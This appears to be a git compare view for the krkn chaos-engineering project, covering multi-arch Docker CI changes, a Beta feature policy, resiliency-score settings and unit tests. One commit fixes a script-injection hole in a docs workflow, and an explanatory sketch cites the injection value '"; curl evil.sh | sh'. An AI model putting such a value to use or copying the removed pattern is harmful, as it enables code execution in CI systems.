Compare commits


10 Commits

Author SHA1 Message Date
Paige Patton
3db5e1abbe no rebuild image (#1197)
Signed-off-by: Paige Patton <prubenda@redhat.com>
2026-03-20 12:54:45 -04:00
Paige Patton
1e699c6cc9 different quay users (#1196)
Signed-off-by: Paige Patton <prubenda@redhat.com>
2026-03-20 17:30:42 +01:00
Paige Patton
0ebda3e101 test multi platform (#1194)
Signed-off-by: Paige Patton <prubenda@redhat.com>
2026-03-20 11:09:33 -04:00
Tullio Sebastiani
8a5be0dd2f Resiliency Score krknctl compatibility fixes (#1195)
* added console log of the resiliency score when mode is "detailed"

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

* base image krknctl input

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

resiliency score flag

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

* removed json print in run_krkn.py

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

* unit test fix

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

---------

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>
2026-03-20 11:09:07 -04:00
Tullio Sebastiani
62dadfe25c Resiliency Score krknctl compatibility fixes (#1195)
* added console log of the resiliency score when mode is "detailed"

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

* base image krknctl input

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

resiliency score flag

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

* removed json print in run_krkn.py

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

* unit test fix

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

---------

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>
2026-03-20 11:08:56 -04:00
Paige Patton
cb368a2f5c adding tests coverage for resiliency scoring (#1161)
Signed-off-by: Paige Patton <prubenda@redhat.com>
2026-03-19 14:16:51 -04:00
Paige Patton
bb636cd3a9 Custom weight to resiliency (#1173)
* feat(resiliency): implement comprehensive resiliency scoring system

- Added resiliency scoring engine
- Implemented scenario-wise scoring with telemetry
- Added configurable SLOs and detailed reporting

Signed-off-by: Abhinav Sharma <abhinavs1920bpl@gmail.com>
Signed-off-by: Paige Patton <prubenda@redhat.com>

* fix: check prometheus url after openshift prometheus check

Signed-off-by: Abhinav Sharma <abhinavs1920bpl@gmail.com>
Signed-off-by: Paige Patton <prubenda@redhat.com>

* custom weight

Signed-off-by: Paige Patton <prubenda@redhat.com>

---------

Signed-off-by: Abhinav Sharma <abhinavs1920bpl@gmail.com>
Signed-off-by: Paige Patton <prubenda@redhat.com>
Co-authored-by: Abhinav Sharma <abhinavs1920bpl@gmail.com>
2026-03-19 13:14:08 -04:00
Arpit Raj
f241b2b62f fix: prevent script injection in require-docs workflow (#1187)
- replace shell interpolation of PR body with jq + $GITHUB_EVENT_PATH
- replace shell interpolation of branch name with actions/github-script
- remove unused actions/checkout step
- add 27 unit tests covering checkbox detection, docs PR search, and
  security regression checks to prevent re-introduction of the bug

Signed-off-by: Arpit Raj <vrxn.arp1traj@gmail.com>
Co-authored-by: Paige Patton <64206430+paigerube14@users.noreply.github.com>
2026-03-17 09:37:35 -04:00
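The safe pattern this commit describes — parse the untrusted PR body out of the event payload with a JSON parser instead of interpolating it into a shell command — can be sketched in Python. This is an illustrative parallel to the workflow's jq + `$GITHUB_EVENT_PATH` approach, not the actual workflow code; the function name and regex are assumptions.

```python
import json
import re


def docs_required(event_path: str) -> bool:
    """Mirror of the workflow's jq + grep check: read the PR body from the
    event payload file, so the shell never sees the user-controlled string."""
    with open(event_path) as f:
        event = json.load(f)
    # body may be null in the payload; normalize to an empty string
    body = event.get("pull_request", {}).get("body") or ""
    return re.search(r"\[x\].*documentation needed", body, re.IGNORECASE) is not None
```

Because the body travels as data (a JSON field, then a Python string) rather than as shell source text, payloads like `"; curl evil.sh | sh` have no way to execute.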
Paige Patton
2a60a519cd adding run tag (#1179)
Signed-off-by: Paige Patton <prubenda@redhat.com>
2026-03-16 16:18:50 -04:00
Naga Ravi Chaitanya Elluri
31756e6d9b Add Beta features governance policy (#1185)
Introduce documentation defining Beta feature expectations, lifecycle,
user guidance, and promotion criteria to GA. This helps users understand
that Beta features are experimental and intended for early feedback.

Signed-off-by: Naga Ravi Chaitanya Elluri <nelluri@redhat.com>
2026-03-12 23:39:14 -04:00
10 changed files with 1749 additions and 56 deletions


@@ -6,48 +6,117 @@ on:
jobs:
build:
runs-on: ubuntu-latest
runs-on: ${{ matrix.runner }}
strategy:
matrix:
include:
- platform: amd64
runner: ubuntu-latest
- platform: arm64
runner: ubuntu-24.04-arm
steps:
- name: Check out code
uses: actions/checkout@v3
- name: Build the Docker images
if: startsWith(github.ref, 'refs/tags')
run: |
./containers/compile_dockerfile.sh
docker build --no-cache -t quay.io/krkn-chaos/krkn containers/ --build-arg TAG=${GITHUB_REF#refs/tags/}
docker tag quay.io/krkn-chaos/krkn quay.io/redhat-chaos/krkn
docker tag quay.io/krkn-chaos/krkn quay.io/krkn-chaos/krkn:${GITHUB_REF#refs/tags/}
docker tag quay.io/krkn-chaos/krkn quay.io/redhat-chaos/krkn:${GITHUB_REF#refs/tags/}
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@v3
- name: Test Build the Docker images
if: ${{ github.event_name == 'pull_request' }}
if: github.event_name == 'pull_request'
run: |
./containers/compile_dockerfile.sh
docker build --no-cache -t quay.io/krkn-chaos/krkn containers/ --build-arg PR_NUMBER=${{ github.event.pull_request.number }}
- name: Login in quay
docker buildx build --no-cache \
--platform linux/${{ matrix.platform }} \
-t quay.io/krkn-chaos/krkn \
-t quay.io/redhat-chaos/krkn \
containers/ \
--build-arg PR_NUMBER=${{ github.event.pull_request.number }}
- name: Login to krkn-chaos quay
if: startsWith(github.ref, 'refs/tags')
run: docker login quay.io -u ${QUAY_USER} -p ${QUAY_TOKEN}
env:
QUAY_USER: ${{ secrets.QUAY_USERNAME }}
QUAY_TOKEN: ${{ secrets.QUAY_PASSWORD }}
- name: Push the KrknChaos Docker images
uses: docker/login-action@v3
with:
registry: quay.io
username: ${{ secrets.QUAY_USERNAME }}
password: ${{ secrets.QUAY_PASSWORD }}
- name: Build and push krkn-chaos images
if: startsWith(github.ref, 'refs/tags')
run: |
docker push quay.io/krkn-chaos/krkn
docker push quay.io/krkn-chaos/krkn:${GITHUB_REF#refs/tags/}
- name: Login in to redhat-chaos quay
if: startsWith(github.ref, 'refs/tags/v')
run: docker login quay.io -u ${QUAY_USER} -p ${QUAY_TOKEN}
env:
QUAY_USER: ${{ secrets.QUAY_USER_1 }}
QUAY_TOKEN: ${{ secrets.QUAY_TOKEN_1 }}
- name: Push the RedHat Chaos Docker images
./containers/compile_dockerfile.sh
TAG=${GITHUB_REF#refs/tags/}
docker buildx build --no-cache \
--platform linux/${{ matrix.platform }} \
--provenance=false \
-t quay.io/krkn-chaos/krkn:latest-${{ matrix.platform }} \
-t quay.io/krkn-chaos/krkn:${TAG}-${{ matrix.platform }} \
containers/ \
--build-arg TAG=${TAG} \
--push --load
- name: Login to redhat-chaos quay
if: startsWith(github.ref, 'refs/tags')
run: |
docker push quay.io/redhat-chaos/krkn
docker push quay.io/redhat-chaos/krkn:${GITHUB_REF#refs/tags/}
uses: docker/login-action@v3
with:
registry: quay.io
username: ${{ secrets.QUAY_USER_1 }}
password: ${{ secrets.QUAY_TOKEN_1 }}
- name: Push redhat-chaos images
if: startsWith(github.ref, 'refs/tags')
run: |
TAG=${GITHUB_REF#refs/tags/}
docker tag quay.io/krkn-chaos/krkn:${TAG}-${{ matrix.platform }} quay.io/redhat-chaos/krkn:${TAG}-${{ matrix.platform }}
docker tag quay.io/krkn-chaos/krkn:${TAG}-${{ matrix.platform }} quay.io/redhat-chaos/krkn:latest-${{ matrix.platform }}
docker push quay.io/redhat-chaos/krkn:${TAG}-${{ matrix.platform }}
docker push quay.io/redhat-chaos/krkn:latest-${{ matrix.platform }}
manifest:
runs-on: ubuntu-latest
needs: build
if: startsWith(github.ref, 'refs/tags')
steps:
- name: Login to krkn-chaos quay
uses: docker/login-action@v3
with:
registry: quay.io
username: ${{ secrets.QUAY_USERNAME }}
password: ${{ secrets.QUAY_PASSWORD }}
- name: Create and push KrknChaos manifests
run: |
TAG=${GITHUB_REF#refs/tags/}
docker manifest create quay.io/krkn-chaos/krkn:${TAG} \
quay.io/krkn-chaos/krkn:${TAG}-amd64 \
quay.io/krkn-chaos/krkn:${TAG}-arm64
docker manifest push quay.io/krkn-chaos/krkn:${TAG}
docker manifest create quay.io/krkn-chaos/krkn:latest \
quay.io/krkn-chaos/krkn:latest-amd64 \
quay.io/krkn-chaos/krkn:latest-arm64
docker manifest push quay.io/krkn-chaos/krkn:latest
- name: Login to redhat-chaos quay
uses: docker/login-action@v3
with:
registry: quay.io
username: ${{ secrets.QUAY_USER_1 }}
password: ${{ secrets.QUAY_TOKEN_1 }}
- name: Create and push RedHat Chaos manifests
run: |
TAG=${GITHUB_REF#refs/tags/}
docker manifest create quay.io/redhat-chaos/krkn:${TAG} \
quay.io/redhat-chaos/krkn:${TAG}-amd64 \
quay.io/redhat-chaos/krkn:${TAG}-arm64
docker manifest push quay.io/redhat-chaos/krkn:${TAG}
docker manifest create quay.io/redhat-chaos/krkn:latest \
quay.io/redhat-chaos/krkn:latest-amd64 \
quay.io/redhat-chaos/krkn:latest-arm64
docker manifest push quay.io/redhat-chaos/krkn:latest
- name: Rebuild krkn-hub
if: startsWith(github.ref, 'refs/tags')
uses: redhat-chaos/actions/krkn-hub@main
with:
QUAY_USER: ${{ secrets.QUAY_USERNAME }}
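Several steps in the workflow above derive the image tag with the shell parameter expansion `${GITHUB_REF#refs/tags/}`, which strips the `refs/tags/` prefix from the ref. A one-line Python equivalent (illustrative only; `tag_from_ref` is not a function in this repo) makes the behavior explicit:

```python
def tag_from_ref(github_ref: str) -> str:
    # Equivalent of shell ${GITHUB_REF#refs/tags/}: remove a leading
    # "refs/tags/" if present, so "refs/tags/v1.2.3" becomes "v1.2.3".
    # Refs that are not tags pass through unchanged.
    return github_ref.removeprefix("refs/tags/")
```

This is why the push steps can tag images as both `latest-<platform>` and `<TAG>-<platform>`: the same `TAG` variable is reused for every per-platform tag.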


@@ -9,37 +9,47 @@ jobs:
name: Check Documentation Update
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Check if Documentation is Required
id: check_docs
run: |
echo "Checking PR body for documentation checkbox..."
# Read the PR body from the GitHub event payload
if echo "${{ github.event.pull_request.body }}" | grep -qi '\[x\].*documentation needed'; then
# Read PR body from the event JSON file — never from shell interpolation.
# jq handles all escaping; the shell never sees the user-controlled string.
if jq -r '.pull_request.body // ""' "$GITHUB_EVENT_PATH" | \
grep -qi '\[x\].*documentation needed'; then
echo "Documentation required detected."
echo "docs_required=true" >> $GITHUB_OUTPUT
echo "docs_required=true" >> "$GITHUB_OUTPUT"
else
echo "Documentation not required."
echo "docs_required=false" >> $GITHUB_OUTPUT
echo "docs_required=false" >> "$GITHUB_OUTPUT"
fi
- name: Enforce Documentation Update (if required)
if: steps.check_docs.outputs.docs_required == 'true'
env:
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
run: |
# Retrieve feature branch and repository owner from the GitHub context
FEATURE_BRANCH="${{ github.head_ref }}"
REPO_OWNER="${{ github.repository_owner }}"
WEBSITE_REPO="website"
echo "Searching for a merged documentation PR for feature branch: $FEATURE_BRANCH in $REPO_OWNER/$WEBSITE_REPO..."
MERGED_PR=$(gh pr list --repo "$REPO_OWNER/$WEBSITE_REPO" --state merged --json headRefName,title,url | jq -r \
--arg FEATURE_BRANCH "$FEATURE_BRANCH" '.[] | select(.title | contains($FEATURE_BRANCH)) | .url')
if [[ -z "$MERGED_PR" ]]; then
echo ":x: Documentation PR for branch '$FEATURE_BRANCH' is required and has not been merged."
exit 1
else
echo ":white_check_mark: Found merged documentation PR: $MERGED_PR"
fi
uses: actions/github-script@v7
with:
github-token: ${{ secrets.GITHUB_TOKEN }}
script: |
const featureBranch = context.payload.pull_request.head.ref;
const repoOwner = context.repo.owner;
const websiteRepo = 'website';
core.info(`Searching for a merged documentation PR for feature branch: ${featureBranch} in ${repoOwner}/${websiteRepo}...`);
const { data: pulls } = await github.rest.pulls.list({
owner: repoOwner,
repo: websiteRepo,
state: 'closed',
per_page: 100,
});
const mergedPr = pulls.find(
(pr) => pr.merged_at && pr.title.includes(featureBranch)
);
if (!mergedPr) {
core.setFailed(
`❌ Documentation PR for branch '${featureBranch}' is required and has not been merged.`
);
} else {
core.info(`✅ Found merged documentation PR: ${mergedPr.html_url}`);
}

BETA_FEATURE_POLICY.md (new file, 141 lines)

@@ -0,0 +1,141 @@
# Beta Features Policy
## Overview
Beta features provide users early access to new capabilities before they reach full stability and general availability (GA). These features allow maintainers to gather feedback, validate usability, and improve functionality based on real-world usage.
Beta features are intended for experimentation and evaluation. While they are functional, they may not yet meet the stability, performance, or backward compatibility guarantees expected from generally available features.
---
## What is a Beta Feature?
A **Beta feature** is released for user evaluation while still under active development and refinement.
Beta features may have the following characteristics:
- Functionally usable but still evolving
- APIs or behavior may change between releases
- Performance optimizations may still be in progress
- Documentation may be limited or evolving
- Edge cases may not be fully validated
Beta features should be considered **experimental and optional**.
---
## User Expectations
Users trying Beta features should understand the following:
- Stability is not guaranteed
- APIs and functionality may change without notice
- Backward compatibility is not guaranteed
- The feature may evolve significantly before GA
- Production use should be evaluated carefully
We strongly encourage users to provide feedback to help improve the feature before it becomes generally available.
---
## Beta Feature Identification
All Beta features are clearly identified to ensure transparency.
### In Release Notes
Beta features will be marked with a **[BETA]** tag.
Example: [BETA] Krkn Resilience Score
### In Documentation
Beta features will include a notice similar to:
> **Beta Feature**
> This feature is currently in Beta and is intended for early user feedback. Behavior, APIs, and stability may change in future releases.
---
## Feature Lifecycle
Features typically progress through the following lifecycle stages.
### 1. Development
The feature is under active development and may not yet be visible to users.
### 2. Beta
The feature is released for early adoption and feedback.
Characteristics:
- Feature is usable
- Feedback is encouraged
- Stability improvements are ongoing
### 3. Stabilization
Based on user feedback and testing, the feature is improved to meet stability and usability expectations.
### 4. General Availability (GA)
The feature is considered stable and production-ready.
GA features provide:
- Stable APIs
- Backward compatibility guarantees
- Complete documentation
- Full CI test coverage
---
## Promotion to General Availability
A Beta feature may be promoted to GA once the following criteria are met:
- Critical bugs are resolved
- Feature stability has improved through testing
- APIs and behavior are stable
- Documentation is complete
- Community feedback has been incorporated
The promotion will be announced in the release notes.
Example: Feature promoted from Beta to GA
---
## Deprecation of Beta Features
In some cases, a Beta feature may be redesigned or discontinued.
If this happens:
- The feature will be marked as **Deprecated**
- A removal timeline will be provided
- Alternative approaches will be documented when possible
Example: [DEPRECATED] This feature will be removed in a future release.
---
## Contributing Feedback
User feedback plays a critical role in improving Beta features.
Users are encouraged to report:
- Bugs
- Usability issues
- Performance concerns
- Feature suggestions
Feedback can be submitted through:
- Krkn GitHub Issues
- Krkn GitHub Discussions
- Krkn Community channels
Please include **Beta feature context** when reporting issues.
Your feedback helps guide the roadmap and ensures features are production-ready before GA.


@@ -55,6 +55,10 @@ kraken:
- kubevirt_vm_outage:
- scenarios/kubevirt/kubevirt-vm-outage.yaml
resiliency:
resiliency_run_mode: standalone # Options: standalone, controller, disabled
resiliency_file: config/alerts.yaml # Path to SLO definitions, will resolve to performance_monitoring: alert_profile: if not specified
cerberus:
cerberus_enabled: False # Enable it when cerberus is previously installed
cerberus_url: # When cerberus_enabled is set to True, provide the url where cerberus publishes go/no-go signal


@@ -163,6 +163,15 @@
"default": "False",
"required": "false"
},
{
"name": "es-run-tag",
"short_description": "Elasticsearch run tag",
"description": "Elasticsearch run tag to compare similar runs",
"variable": "ES_RUN_TAG",
"type": "string",
"default": "",
"required": "false"
},
{
"name": "es-server",
"short_description": "Elasticsearch instance URL",
@@ -549,5 +558,31 @@
"separator": ",",
"default": "False",
"required": "false"
},
{
"name": "resiliency-score",
"short_description": "Enable resiliency score calculation",
"description": "The system outputs a detailed resiliency score as a single-line JSON object, facilitating easy aggregation across multiple test scenarios.",
"variable": "RESILIENCY_SCORE",
"type": "boolean",
"required": "false"
},
{
"name": "disable-resiliency-score",
"short_description": "Disable resiliency score calculation",
"description": "Disable resiliency score calculation",
"variable": "DISABLE_RESILIENCY_SCORE",
"type": "boolean",
"required": "false"
},
{
"name": "resiliency-file",
"short_description": "Resiliency Score metrics file",
"description": "Custom Resiliency score file",
"variable": "RESILIENCY_FILE",
"type": "file",
"required": "false",
"mount_path": "/home/krkn/resiliency-file.yaml"
}
]


@@ -320,7 +320,7 @@ class Resiliency:
)
detailed = self.get_detailed_report()
if run_mode == "controller":
if run_mode == "detailed":
# krknctl expects the detailed report on stdout in a special format
try:
detailed_json = json.dumps(detailed)


@@ -1,4 +1,4 @@
duration: 60
duration: 10
workers: '' # leave it empty '' node cpu auto-detection
hog-type: cpu
image: quay.io/krkn-chaos/krkn-hog

tests/test_prometheus_collector.py (new file, 401 lines)

@@ -0,0 +1,401 @@
"""
Tests for krkn.prometheus.collector module.
How to run these tests:
# Run all tests in this file
python -m unittest tests.test_prometheus_collector
# Run all tests with verbose output
python -m unittest tests.test_prometheus_collector -v
# Run a specific test class
python -m unittest tests.test_prometheus_collector.TestSLOPassed
python -m unittest tests.test_prometheus_collector.TestEvaluateSLOs
# Run a specific test method
python -m unittest tests.test_prometheus_collector.TestSLOPassed.test_empty_result_returns_none
python -m unittest tests.test_prometheus_collector.TestEvaluateSLOs.test_evaluate_single_slo_passing
# Run with coverage
python -m coverage run -m unittest tests.test_prometheus_collector
python -m coverage report -m
"""
import datetime
import unittest
from unittest.mock import Mock, patch, MagicMock
from krkn.prometheus.collector import slo_passed, evaluate_slos
class TestSLOPassed(unittest.TestCase):
"""Test cases for the slo_passed function."""
def test_empty_result_returns_none(self):
"""Test that an empty result list returns None."""
result = slo_passed([])
self.assertIsNone(result)
def test_result_with_values_all_zero_returns_true(self):
"""Test that all zero values in 'values' returns True."""
prometheus_result = [
{
"values": [
[1234567890, "0"],
[1234567891, "0"],
[1234567892, "0"],
]
}
]
result = slo_passed(prometheus_result)
self.assertTrue(result)
def test_result_with_values_containing_nonzero_returns_false(self):
"""Test that any non-zero value in 'values' returns False."""
prometheus_result = [
{
"values": [
[1234567890, "0"],
[1234567891, "1.5"], # Non-zero value
[1234567892, "0"],
]
}
]
result = slo_passed(prometheus_result)
self.assertFalse(result)
def test_result_with_single_value_zero_returns_true(self):
"""Test that a single 'value' field with zero returns True."""
prometheus_result = [
{
"value": [1234567890, "0"]
}
]
result = slo_passed(prometheus_result)
self.assertTrue(result)
def test_result_with_single_value_nonzero_returns_false(self):
"""Test that a single 'value' field with non-zero returns False."""
prometheus_result = [
{
"value": [1234567890, "5.2"]
}
]
result = slo_passed(prometheus_result)
self.assertFalse(result)
def test_result_with_no_samples_returns_none(self):
"""Test that result with no 'values' or 'value' keys returns None."""
prometheus_result = [
{
"metric": {"job": "test"}
}
]
result = slo_passed(prometheus_result)
self.assertIsNone(result)
def test_result_with_invalid_value_type_in_values(self):
"""Test handling of invalid value types in 'values' field."""
prometheus_result = [
{
"values": [
[1234567890, "invalid"], # Will raise ValueError
[1234567891, "0"],
]
}
]
# Should continue processing after ValueError and find the zero
result = slo_passed(prometheus_result)
self.assertTrue(result)
def test_result_with_invalid_value_in_single_value_returns_false(self):
"""Test that invalid value type in 'value' field returns False."""
prometheus_result = [
{
"value": [1234567890, "invalid"]
}
]
result = slo_passed(prometheus_result)
self.assertFalse(result)
def test_result_with_none_value_in_values(self):
"""Test handling of None values in 'values' field."""
prometheus_result = [
{
"values": [
[1234567890, None], # Will raise TypeError
[1234567891, "0"],
]
}
]
# Should continue processing after TypeError and find the zero
result = slo_passed(prometheus_result)
self.assertTrue(result)
def test_result_with_multiple_series_first_has_nonzero(self):
"""Test that first non-zero value in any series returns False immediately."""
prometheus_result = [
{
"values": [
[1234567890, "0"],
[1234567891, "2.0"], # Non-zero in first series
]
},
{
"values": [
[1234567890, "0"],
[1234567891, "0"],
]
}
]
result = slo_passed(prometheus_result)
self.assertFalse(result)
def test_result_with_float_zero(self):
"""Test that float zero is handled correctly."""
prometheus_result = [
{
"values": [
[1234567890, "0.0"],
[1234567891, "0.00"],
]
}
]
result = slo_passed(prometheus_result)
self.assertTrue(result)
def test_result_with_scientific_notation(self):
"""Test values in scientific notation."""
prometheus_result = [
{
"values": [
[1234567890, "0e0"],
[1234567891, "1e-10"], # Very small but non-zero
]
}
]
result = slo_passed(prometheus_result)
self.assertFalse(result)
class TestEvaluateSLOs(unittest.TestCase):
"""Test cases for the evaluate_slos function."""
def setUp(self):
"""Set up test fixtures."""
self.mock_prom_cli = Mock()
self.start_time = datetime.datetime(2025, 1, 1, 0, 0, 0)
self.end_time = datetime.datetime(2025, 1, 1, 1, 0, 0)
def test_evaluate_single_slo_passing(self):
"""Test evaluation of a single passing SLO."""
slo_list = [
{
"name": "test_slo",
"expr": "sum(rate(http_requests_total[5m]))"
}
]
# Mock the Prometheus response with all zeros (passing)
self.mock_prom_cli.process_prom_query_in_range.return_value = [
{
"values": [
[1234567890, "0"],
[1234567891, "0"],
]
}
]
results = evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
self.assertEqual(results["test_slo"], True)
self.mock_prom_cli.process_prom_query_in_range.assert_called_once_with(
"sum(rate(http_requests_total[5m]))",
start_time=self.start_time,
end_time=self.end_time,
)
def test_evaluate_single_slo_failing(self):
"""Test evaluation of a single failing SLO."""
slo_list = [
{
"name": "test_slo",
"expr": "sum(rate(errors[5m]))"
}
]
# Mock the Prometheus response with non-zero value (failing)
self.mock_prom_cli.process_prom_query_in_range.return_value = [
{
"values": [
[1234567890, "0"],
[1234567891, "5"], # Non-zero indicates failure
]
}
]
results = evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
self.assertEqual(results["test_slo"], False)
def test_evaluate_slo_with_no_data_returns_true(self):
"""Test that SLO with no data (None) is treated as passing."""
slo_list = [
{
"name": "test_slo",
"expr": "absent(metric)"
}
]
# Mock the Prometheus response with no samples
self.mock_prom_cli.process_prom_query_in_range.return_value = []
results = evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
# No data should be treated as passing
self.assertEqual(results["test_slo"], True)
def test_evaluate_slo_query_exception_returns_false(self):
"""Test that an exception during query results in False."""
slo_list = [
{
"name": "test_slo",
"expr": "invalid_query"
}
]
# Mock the Prometheus client to raise an exception
self.mock_prom_cli.process_prom_query_in_range.side_effect = Exception("Query failed")
with patch('krkn.prometheus.collector.logging') as mock_logging:
results = evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
# Exception should result in False
self.assertEqual(results["test_slo"], False)
mock_logging.error.assert_called_once()
def test_evaluate_multiple_slos(self):
"""Test evaluation of multiple SLOs with mixed results."""
slo_list = [
{
"name": "slo_pass",
"expr": "query1"
},
{
"name": "slo_fail",
"expr": "query2"
},
{
"name": "slo_no_data",
"expr": "query3"
}
]
# Mock different responses for each query
def mock_query_side_effect(expr, start_time, end_time):
if expr == "query1":
return [{"values": [[1234567890, "0"]]}]
elif expr == "query2":
return [{"values": [[1234567890, "1"]]}]
else: # query3
return []
self.mock_prom_cli.process_prom_query_in_range.side_effect = mock_query_side_effect
results = evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
self.assertEqual(results["slo_pass"], True)
self.assertEqual(results["slo_fail"], False)
self.assertEqual(results["slo_no_data"], True)
self.assertEqual(len(results), 3)
def test_evaluate_empty_slo_list(self):
"""Test evaluation with an empty SLO list."""
slo_list = []
results = evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
self.assertEqual(results, {})
self.mock_prom_cli.process_prom_query_in_range.assert_not_called()
@patch('krkn.prometheus.collector.logging')
def test_evaluate_slos_logs_info_message(self, mock_logging):
"""Test that evaluation logs an info message with SLO count."""
slo_list = [
{"name": "slo1", "expr": "query1"},
{"name": "slo2", "expr": "query2"},
]
self.mock_prom_cli.process_prom_query_in_range.return_value = [
{"values": [[1234567890, "0"]]}
]
evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
# Check that info logging was called with the expected message
mock_logging.info.assert_called_once()
call_args = mock_logging.info.call_args[0]
self.assertIn("Evaluating %d SLOs", call_args[0])
self.assertEqual(call_args[1], 2)
@patch('krkn.prometheus.collector.logging')
def test_evaluate_slos_logs_debug_for_no_data(self, mock_logging):
"""Test that no data scenario logs a debug message."""
slo_list = [
{"name": "test_slo", "expr": "query"}
]
self.mock_prom_cli.process_prom_query_in_range.return_value = []
evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
# Check that debug logging was called
mock_logging.debug.assert_called_once()
call_args = mock_logging.debug.call_args[0]
self.assertIn("no data", call_args[0])
self.assertIn("test_slo", call_args[1])
if __name__ == '__main__':
unittest.main()
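Taken together, these tests pin down a three-valued contract for `slo_passed` (True if every sample is zero, False on any non-zero sample, None when the query returned no samples) and a name-to-bool map for `evaluate_slos` in which exceptions count as failures and missing data counts as passing. A minimal sketch consistent with the assertions — an approximation of the behavior, not the module's actual source:

```python
def slo_passed(prom_result):
    """True if every sample is zero, False on any non-zero sample,
    None if the query returned no samples at all."""
    saw_sample = False
    for series in prom_result:
        if "values" in series:  # range query: list of [timestamp, value]
            for _, value in series["values"]:
                saw_sample = True
                try:
                    if float(value) != 0:
                        return False
                except (TypeError, ValueError):
                    continue  # unparsable sample: skip, keep scanning
        elif "value" in series:  # instant query: single [timestamp, value]
            saw_sample = True
            try:
                if float(series["value"][1]) != 0:
                    return False
            except (TypeError, ValueError):
                return False  # unparsable instant value counts as failure
    return True if saw_sample else None


def evaluate_slos(prom_cli, slo_list, start_time, end_time):
    """Evaluate each SLO expression over the chaos window.
    No data is treated as passing; a query error is treated as failing."""
    results = {}
    for slo in slo_list:
        try:
            samples = prom_cli.process_prom_query_in_range(
                slo["expr"], start_time=start_time, end_time=end_time
            )
            passed = slo_passed(samples)
            results[slo["name"]] = True if passed is None else passed
        except Exception:
            results[slo["name"]] = False
    return results
```

The "no data passes" choice matters: an alert expression that never fired during the run produces an empty result set, which should not be scored as an SLO breach.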

tests/test_resiliency.py (new file, 624 lines)

@@ -0,0 +1,624 @@
"""
Tests for krkn.resiliency.resiliency module.
How to run these tests:
# Run all tests in this file
python -m unittest tests.test_resiliency
# Run all tests with verbose output
python -m unittest tests.test_resiliency -v
# Run a specific test class
python -m unittest tests.test_resiliency.TestResiliencyInit
python -m unittest tests.test_resiliency.TestResiliencyCalculateScore
python -m unittest tests.test_resiliency.TestResiliencyScenarioReports
# Run a specific test method
python -m unittest tests.test_resiliency.TestResiliencyInit.test_init_from_file
python -m unittest tests.test_resiliency.TestResiliencyScenarioReports.test_add_scenario_report
# Run with coverage
python -m coverage run -m unittest tests.test_resiliency
python -m coverage report -m
"""
import datetime
import json
import os
import tempfile
import unittest
from unittest.mock import Mock, patch
from krkn.resiliency.resiliency import Resiliency
class TestResiliencyInit(unittest.TestCase):
"""Test cases for Resiliency class initialization."""
def test_init_from_file(self):
"""Test initialization from alerts.yaml file."""
alerts_data = [
{"expr": "up == 0", "severity": "critical", "description": "Instance down"},
{"expr": "cpu > 80", "severity": "warning", "description": "High CPU"},
]
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump(alerts_data, f)
temp_file = f.name
try:
res = Resiliency(alerts_yaml_path=temp_file)
self.assertEqual(len(res._slos), 2)
self.assertEqual(res._slos[0]["name"], "Instance down")
self.assertEqual(res._slos[0]["expr"], "up == 0")
self.assertEqual(res._slos[0]["severity"], "critical")
finally:
os.unlink(temp_file)
def test_init_from_file_not_found_raises_error(self):
"""Test that missing alerts file raises FileNotFoundError."""
with self.assertRaises(FileNotFoundError):
Resiliency(alerts_yaml_path="/nonexistent/path.yaml")
def test_init_preserves_custom_weight_on_slo(self):
"""Test that custom weight is preserved from the alerts file."""
alerts_data = [
{"expr": "up == 0", "severity": "critical", "description": "slo1", "weight": 10},
]
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump(alerts_data, f)
temp_file = f.name
try:
res = Resiliency(alerts_yaml_path=temp_file)
self.assertEqual(res._slos[0]["weight"], 10)
finally:
os.unlink(temp_file)
def test_normalise_alerts_with_valid_data(self):
"""Test _normalise_alerts with valid alert data."""
raw_alerts = [
{"expr": "up == 0", "severity": "critical", "description": "Down"},
{"expr": "cpu > 80", "severity": "warning", "description": "High CPU"},
]
normalized = Resiliency._normalise_alerts(raw_alerts)
self.assertEqual(len(normalized), 2)
self.assertEqual(normalized[0]["name"], "Down")
self.assertEqual(normalized[1]["name"], "High CPU")
def test_normalise_alerts_without_description_uses_index(self):
"""Test _normalise_alerts uses index as name when description missing."""
raw_alerts = [
{"expr": "up == 0", "severity": "critical"},
]
normalized = Resiliency._normalise_alerts(raw_alerts)
self.assertEqual(normalized[0]["name"], "slo_0")
def test_normalise_alerts_skips_invalid_entries(self):
"""Test _normalise_alerts skips entries missing required fields."""
raw_alerts = [
{"expr": "up == 0", "severity": "critical"}, # Valid
{"severity": "warning"}, # Missing expr
{"expr": "cpu > 80"}, # Missing severity
"invalid", # Not a dict
]
with patch('krkn.resiliency.resiliency.logging') as mock_logging:
normalized = Resiliency._normalise_alerts(raw_alerts)
self.assertEqual(len(normalized), 1)
self.assertEqual(mock_logging.warning.call_count, 3)
def test_normalise_alerts_with_non_list_raises_error(self):
"""Test _normalise_alerts raises ValueError for non-list input."""
with self.assertRaises(ValueError):
Resiliency._normalise_alerts("not a list")
